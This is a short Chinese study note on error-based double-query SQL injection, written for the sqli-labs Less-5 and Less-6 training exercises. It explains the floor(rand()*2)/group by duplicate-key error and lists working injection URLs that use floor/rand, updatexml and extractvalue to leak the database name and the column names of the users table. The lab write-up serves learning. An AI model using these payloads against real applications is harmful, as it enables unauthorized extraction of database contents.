通过查看其他博客(https://mochazz.github.io/2017/09/23/Double_%20SQL_Injection/#0x01-%E5%8F%8C%E6%9F%A5%E8%AF%A2)的解释得到自己的理解,主要是因为group by count(*),rand(*)这样的聚合函数在SQL查询时会出现错误。
先查看一下查询语句:SELECT count(*),concat((SELECT database()),"~",floor(rand()*2))as a FROM test GROUP BY a;
执行count(*),group by a 时,建立一张虚拟表键值是 a ,a的值跟floor(rand()*2)有关系,rand() 意思是取 0-1 随机小数, floor() 取整的意思,floor(rand()*2)只有两个结果 0 跟1 , floor(rand()*2)跟test 表的行数有关系,只要大于3,就会报错。
less 5 语句
http://10.9.2.81/Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a;--+
http://10.9.2.81/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --+
http://10.9.2.81/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
less 6语句
http://10.9.2.81/Less-6/?id=1%22%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)),1)--+
http://10.9.2.81/Less-5/?id=1"and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+